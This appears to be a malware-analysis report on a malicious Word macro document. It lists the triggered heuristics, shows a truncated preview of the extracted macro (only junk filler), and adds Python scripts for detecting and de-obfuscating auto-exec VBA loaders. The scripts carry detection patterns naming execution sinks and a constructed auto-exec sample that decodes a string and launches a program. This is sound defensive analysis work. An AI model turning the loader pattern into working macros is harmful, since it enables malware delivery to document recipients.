Verdict: MALICIOUS (Risk Score 302)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
This Office document triggers multiple high and critical severity heuristics indicating obfuscated, auto-executing VBA macros. The macros rebuild strings at runtime with a custom decoder and pass them to object-instantiation and execution sinks, which is consistent with downloader or dropper functionality; the ~70 KB of extracted source (macros.bas, below) is dominated by junk arithmetic and Select Case filler that hides the few live statements. Legacy WordBasic auto-exec markers and an Excel 4.0 (XLM) macro sheet are present alongside the VBA project, pointing to several parallel routes to execution. Note that the WordBasic heuristic reports that no modern VBA project was recovered even though one was extracted here, so treat that finding as supplementary evidence rather than a separate payload.
Heuristics (9)

- ClamAV: Doc.Malware.00536d-6863482-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.00536d-6863482-0
- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]: Document contains VBA macro code
- Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Excel 4.0 (XLM) macro sheet present [medium, OLE_XLM_AUTOOPEN]: Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard OOXML DrawingML schema namespace string, not a download location.
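The two heuristics that carry this verdict, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER (auto-exec entry point plus custom string decoder plus COM/execution sink) and OLE_VBA_PCODE_AUTOEXEC_EXEC (token co-occurrence in a compiled stream), are easy to reproduce on your own extracted macros. The script below is an added example written for this page, not the analyzer's own rule code: the VBA sample, the byte stream, the decoder-shape regexes, the sink and token lists, and the severity grading are all my assumptions, chosen to match the heuristic descriptions above. It also shows why a plain string-IOC scan misses this shape: nothing in the constructed source literally says "WScript.Shell" or contains a URL, yet the shape-based check fires at critical.

```python
import re

# Constructed VBA source (added example, not the page's extracted macro). It has the
# loader shape OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER describes: an auto-exec entry point,
# a numeric char-array decoder, and a COM-instantiation sink, with no plain
# "WScript.Shell", command line or URL literal anywhere in the source.
SAMPLE_VBA = r'''
Function d(k)
    Dim t As String, i As Integer
    For i = LBound(k) To UBound(k)
        t = t & Chr(k(i) - 9)
    Next
    d = t
End Function

Sub AutoOpen()
    Dim x, y, o
    x = Array(96, 92, 108, 123, 114, 121, 125, 55, 92, 113, 110, 117, 117)
    y = Array(108, 106, 117, 108)
    Set o = CreateObject(d(x))
    o.Run d(y), 0
End Sub
'''

# Auto-execution entry points (Word and Excel), matched on the procedure definition.
AUTOEXEC = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+'
    r'(AutoOpen|Auto_Open|AutoExec|AutoClose|Auto_Close|Document_Open|'
    r'Document_Close|Workbook_Open|Workbook_Activate)\b', re.I | re.M)

# The three decoder shapes named by the heuristic (thresholds are my assumption).
# A shape fires only when every pattern in its list is present, so a lone Chr()
# or Mid() call does not count.
DECODER_SHAPES = {
    'numeric-char-array': [re.compile(r'\bArray\s*\((?:\s*\d+\s*,){6,}', re.I),
                           re.compile(r'\bChr[BW]?\s*\(', re.I)],
    'hex-string-decode':  [re.compile(r'\bMid\$?\s*\(', re.I),
                           re.compile(r'&H|\bHex\$?\s*\(', re.I),
                           re.compile(r'\bChr[BW]?\s*\(', re.I)],
    'junk-token-replace': [re.compile(r'\bReplace\s*\([^,\n]+,\s*"[^"\n]{2,}"\s*,\s*""\s*\)', re.I)],
}

# COM-instantiation and execution sinks, as a direct call or as a method on an object.
SINKS = re.compile(
    r'\b(?P<call>CreateObject|GetObject|Shell|CallByName|ShellExecute|URLDownloadToFile)\s*\('
    r'|\.\s*(?P<method>Run|Exec|ShellExecute|Navigate)\b', re.I)

# What a literal-string IOC scan would look for; the loader shape keeps these out.
PLAIN_IOCS = re.compile(
    r'WScript\.Shell|Scripting\.FileSystemObject|MSXML2|https?://|powershell|cmd\.exe', re.I)


def classify_vba(src: str) -> dict:
    """Reproduce the loader heuristic over decoded VBA source and grade it."""
    autoexec = sorted({m.group(1) for m in AUTOEXEC.finditer(src)})
    shapes = [label for label, pats in DECODER_SHAPES.items()
              if all(p.search(src) for p in pats)]
    sinks = sorted({m.group('call') or m.group('method') for m in SINKS.finditer(src)})
    plain = sorted({m.group(0) for m in PLAIN_IOCS.finditer(src)})
    if autoexec and shapes and sinks:
        severity = 'critical'          # the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER shape
    elif autoexec and sinks:
        severity = 'high'              # auto-exec plus a sink, no decoder recognised
    elif autoexec or sinks or shapes:
        severity = 'medium'
    else:
        severity = 'info'
    return {'autoexec': autoexec, 'decoder_shapes': shapes, 'sinks': sinks,
            'plain_iocs': plain, 'severity': severity}


# --- p-code / cache-stream variant (OLE_VBA_PCODE_AUTOEXEC_EXEC) ---------------------
# Compiled streams carry identifier names as ASCII or UTF-16LE, so scan for both.
PCODE_AUTOEXEC = [b'AutoOpen', b'Auto_Open', b'AutoExec', b'Document_Open', b'Workbook_Open']
PCODE_EXEC = [b'CreateObject', b'GetObject', b'Shell', b'WScript.Shell',
              b'URLDownloadToFile', b'XMLHTTP', b'Environ']

# Constructed stand-in for a cache stream whose source module could not be decoded.
SAMPLE_PCODE = (b'\x00\x00\x01\x02' + 'AutoOpen'.encode('utf-16-le') + b'\x00\x00\x04'
                + b'\x93\x01CreateObject' + b'\x00' * 4 + b'\x94\x01Shell\x00')


def scan_pcode_stream(stream: bytes) -> dict:
    """Case-insensitive token scan over raw bytes in ASCII and UTF-16LE spellings."""
    low = stream.lower()

    def hits(tokens):
        found = set()
        for tok in tokens:
            ascii_form = tok.lower()
            wide_form = ascii_form.decode('ascii').encode('utf-16-le')
            if ascii_form in low or wide_form in low:
                found.add(tok.decode('ascii'))
        return sorted(found)

    auto, exe = hits(PCODE_AUTOEXEC), hits(PCODE_EXEC)
    return {'autoexec': auto, 'exec': exe, 'fires': bool(auto and exe)}


if __name__ == '__main__':
    print(classify_vba(SAMPLE_VBA))
    print(scan_pcode_stream(SAMPLE_PCODE))
```

Run it against the output of olevba (or any decoded module) and against the raw `_VBA_PROJECT`/`__SRP_*` streams from the OLE container; the p-code scan is deliberately crude because its job is only to flag documents where the source view is empty or broken, which is exactly where a source-only rule goes blind.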
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 70621 bytes |

SHA-256 (macros.bas): 35b6db39a8847833c0391d29fb589d105ae654438daf57466354b9d3b0a40016
Preview of the extracted script (first 1,000 lines; shown here truncated):

```vba
Attribute VB_Name = "f_31851"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "k_3513_3"
Function A_63977()
z2_84_ = 574976157 - 257719198
r72_53_ = 960679306 + m526203_
Select Case U76_73
Case 346039918
o37_219 = Chr(494929532 * Tan(c72_77))
R78___ = R1542_
Case 88380067
k46168 = W__48_5
A4_158 = j8253_
Case 367438892
n341__63 = 404918407
o_2171 = n1607__1
End Select
A2_8_6 = 169847144 - 486005855
v091__4_ = 744335508 + E25_3_03
Select Case J_9383
Case 894445451
C__2_5_9 = Chr(225161514 * Tan(C9_5_170))
Z56___1 = n52__2
Case 366263029
a367_62 = N47_33
V5529__ = U___482
Case 987123559
z181038 = 737048982
B2_45010 = N073_305
End Select
U22____9 = 718572046 - 69646328
I__543_ = 415160535 + M3_70_45
Select Case L581_03
Case 401759503
M__235 = Chr(652165806 * Tan(d24_8_))
V1_66_ = q5_59_
Case 340969289
h65_5654 = O_81310_
u_26_51 = j9_1__79
Case 171279682
a3614444 = 548447535
L____5__ = U8638_0
End Select
Q_16376 = 502460717 - 628163067
W_6490_ = 847947648 + l2872_
Select Case w331_133
Case 978826809
z7_792_ = Chr(349916663 * Tan(Y__689))
w28_005 = B626007
Case 932063374
f_539_08 = h57701
E_524___ = o267__29
Case 603910308
v12_2___ = 589097459
j9__670 = j8__5_
End Select
l_8__4 = 698887728 - 843169259
r83_6528 = 297792678 + R7073836
Select Case p_2_1364
Case 130973780
C2932_2 = Chr(446149613 * Tan(k5265_))
i876_18 = T3053785
Case 331836932
E_1_782 = b051072_
f9___5 = b_82__17
Case 826086433
w7__350 = 802856088
k69036_ = Q9489_67
End Select
S5662_ = 89938057 - 354889114
m681_5 = 105751522 + r036_5
Select Case I_206_
Case 270158298
i_3747_ = Chr(589705305 * Tan(i_316_8))
I_813__ = c6842806
Case 230739638
I7_0_42 = l__0__62
k52_1_16 = P18_940
Case 197137675
w0_719 = 506944049
T3904_4 = l_0_550
End Select
F_3678_ = 565148037 - 785979737
Y_905__1 = 965192363 + R579__
Select Case i21_567_
Case 16794265
k609241_ = Chr(656896479 * Tan(D8__7___))
V___6155 = w_1__0
Case 735510730
k_72017 = v9_35_4
q0300_81 = s__2972
Case 142385586
N____644 = 788706696
j71_03 = j90__3
End Select
End Function
Function p__2_1(D896_8_, N996000_)
On Error Resume Next
W628051_ = 52606727 - 767547973
o96058 = 623563575 + J_1_087
Select Case I__5818
Case 7789508
N32___ = Chr(191939853 * Tan(C977344))
j__846 = W71525
Case 646232976
O224385 = C050157
w70_029 = L3_4_1_1
Case 143446244
X668_5__ = 788077231
p9_0__66 = s_2_8__
End Select
V_2_67 = 522649480 - 524683014
o7__340_ = 12528873 + T_3659_
Select Case E04234
Case 448673958
C46932 = Chr(117652151 * Tan(c9009__))
z91__21_ = k8____
Case 959408227
m_14_4 = f6265277
K74951__ = p__9804
Case 997338434
I99577_ = 892598145
a47____ = z627910
End Select
M___0__ = 467162549 - 843417121
A9___1_ = 898572517 + i_1__861
Select Case X4____2_
Case 571335642
J50857_4 = Chr(441180595 * Tan(l_0_0_0))
U5___02 = v_591686
Case 429244377
Z_2328 = t2353_
d__05_58 = H_4657
Case 62020415
f49_39_1 = 860710509
I9_8_99 = Z886164_
End Select
Se
```

... (truncated)
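Every statement visible in the preview above is filler: arithmetic assigned to variables nothing reads, Select Case blocks keyed on variables that are never assigned, and Chr(N * Tan(x)) expressions whose results are discarded. The obvious triage step is to delete dead assignments and the control-flow blocks that contain only dead assignments, so the live statements (the decoder and the sink the heuristics describe) stand out. The script below is an added example written for this page, not analyzer output; it runs on a short constructed macro in the same style as the preview, with one AutoOpen whose three real statements are buried in the same filler. It is a liveness pass on flat VBA, not a parser: it assumes one statement per line, handles Sub/Function/Select Case nesting, and treats any non-assignment statement (a method call, for instance) as live.

```python
import re

# Constructed VBA (added example, not the page's extracted macro) in the style of the
# preview: arithmetic assignments to variables nothing reads, Select Case blocks keyed
# on never-assigned variables, Chr(N * Tan(x)) noise, and one AutoOpen whose three
# real statements are buried in the same filler.
SAMPLE = '''
Function A_63977()
z2_84_ = 574976157 - 257719198
r72_53_ = 960679306 + m526203_
Select Case U76_73
Case 346039918
o37_219 = Chr(494929532 * Tan(c72_77))
R78___ = R1542_
Case 88380067
k46168 = W__48_5
End Select
End Function
Sub AutoOpen()
W628051_ = 52606727 - 767547973
q__1 = "W" & "Script" & ".Sh" & "ell"
Select Case E04234
Case 448673958
C46932 = Chr(117652151 * Tan(c9009__))
End Select
Set o_7 = CreateObject(q__1)
o_7.Run "calc", 0
End Sub
'''

CLOSE = re.compile(r'^End\s+(?:Sub|Function|Select)\b', re.I)
OPEN = re.compile(r'^(?:(?:Public|Private)\s+)?(?:Sub|Function|Select\s+Case)\b', re.I)
CTRL = re.compile(r'^(?:Case|Dim|On\s+Error|Exit|Next|For|If|Else|End\s+If|Loop|Do|While|Wend)\b', re.I)
ASSIGN = re.compile(r'^(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+)$')
IDENT = re.compile(r'[A-Za-z_]\w*')


def idents(expr):
    """Identifiers read by an expression: string literals removed, case-folded (VBA is case-insensitive)."""
    return {m.group(0).lower() for m in IDENT.finditer(re.sub(r'"[^"]*"', '""', expr))}


def parse(line):
    if CLOSE.match(line):
        return ('close', None, None)
    if OPEN.match(line):
        return ('open', None, None)
    if CTRL.match(line):
        return ('ctrl', None, None)
    m = ASSIGN.match(line)
    if m:
        return ('assign', m.group(1).lower(), m.group(2))
    return ('stmt', None, line)      # a call or method invocation: always live


def strip_junk(src):
    lines = [l.strip() for l in src.splitlines() if l.strip()]
    parsed = [parse(l) for l in lines]

    # Liveness: calls are live; an assignment is live only if a live line reads its
    # target. Iterate to a fixed point so chains (q__1 -> o_7 -> o_7.Run) resolve.
    live = {i for i, (k, _, _) in enumerate(parsed) if k == 'stmt'}
    while True:
        reads = set().union(*(idents(parsed[i][2]) for i in live))
        new = {i for i, (k, lhs, _) in enumerate(parsed)
               if k == 'assign' and i not in live and lhs in reads}
        if not new:
            break
        live |= new

    # Block structure: a Sub/Function/Select Case block survives only if it encloses
    # a live line; its Case/Dim/... lines survive with it, and a dead block is dropped
    # whole, header included.
    stack, block_of, blocks = [], {}, []
    for i, (k, _, _) in enumerate(parsed):
        if k == 'close':
            o = stack.pop()
            blocks.append((o, i))
            block_of[i] = o
            continue
        block_of[i] = stack[-1] if stack else None
        if k == 'open':
            stack.append(i)
    live_blocks = {o for o, c in blocks if any(o < j < c for j in live)}

    kept = [lines[i] for i, (k, _, _) in enumerate(parsed)
            if i in live
            or (k == 'open' and i in live_blocks)
            or (k in ('close', 'ctrl') and block_of[i] in live_blocks)]
    return {'kept': kept, 'total': len(lines), 'dropped': len(lines) - len(kept)}


if __name__ == '__main__':
    r = strip_junk(SAMPLE)
    print(f"kept {len(r['kept'])} of {r['total']} lines")
    print('\n'.join(r['kept']))
```

On the constructed sample the pass keeps five of twenty-one lines: the AutoOpen header and footer, the string reconstruction, the CreateObject call and the Run call. Applied to the real macros.bas it will discard Function A_63977 entirely, since nothing in it is ever read, and leave the procedures that actually do the decoding and execution; review those by hand, because a variable read only from inside a dead line is still reported as dead and a payload that runs through CallByName or an event handler will not look like a plain call to this pass.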